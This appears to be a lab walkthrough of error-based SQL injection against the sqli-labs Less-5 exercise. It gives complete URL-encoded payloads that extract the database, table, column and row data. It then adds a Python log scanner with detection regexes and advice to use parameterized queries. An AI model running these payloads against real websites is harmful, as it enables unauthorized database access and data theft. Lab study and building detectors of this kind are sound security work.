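Error-based SQL injection method
1. Determine the submission method
String (character) type:
2. Construct the closing character:
The closing character here is '
3. Using the HackBar plugin, you can generate the URL to request
Database name: security
Clicking "database" produces the statement that queries the database; copy and paste that statement into the URL to obtain the database name.
URL statement: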
http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+
Table name: emails
As above, click "tables" and enter the database name to get the statement that returns the table name.
URL statement:
http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(table_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+
Column name: id
URL statement:
http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20%20%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(column_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name=0x656d61696c73%20AND%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+
Data: 1
URL statement:
AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(id) AS CHAR),0x7e)) FROM security.emails LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
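
For the defending side, the requests above leave a recognizable shape in web server access logs. The following is an added example, not part of the original notes: a small Python scanner that URL-decodes each query parameter and flags the COUNT(*)/CONCAT/FLOOR(RAND(0)*2)/GROUP BY pattern. The function names, signature names and the sample log lines (client IPs, timestamps, sizes) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures of the error-based "double query" shape seen in the URLs above.
SIGNATURES = {
    "rand_group_by": re.compile(
        r"floor\s*\(\s*rand\s*\(.*?\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "count_concat": re.compile(r"count\s*\(\s*\*\s*\)\s*,\s*concat\s*\(", re.I),
    "information_schema": re.compile(
        r"information_schema\s*\.\s*(tables|columns)", re.I),
    "hex_literal_compare": re.compile(r"=\s*0x[0-9a-f]{4,}", re.I),
}

# Apache/Nginx "combined" format: client IP, two fields, [time], "METHOD target proto".
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

def scan_value(value):
    """Return the sorted names of the signatures found in one decoded value."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(value))

def scan_log_line(line):
    """Return [(client_ip, parameter, signature_names)] for suspicious parameters."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    findings = []
    # parse_qsl percent-decodes each value and turns '+' into a space.
    query = urlsplit(m.group("target")).query
    for param, value in parse_qsl(query, keep_blank_values=True):
        hits = scan_value(value)
        if len(hits) >= 2:  # two independent signatures keep false positives down
            findings.append((m.group("ip"), param, hits))
    return findings

# Constructed sample lines: client IP, timestamp, status and size are made up;
# the first request target is the database-name URL from this page.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli-labs-master/Less-5/?id=1%20%27%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+ HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli-labs-master/Less-5/?id=1 HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_log_line(entry) or "clean")
```

Pattern matching like this is a triage aid for logs; the fix in the application itself is a parameterized query for `id` and not returning database error text to the client.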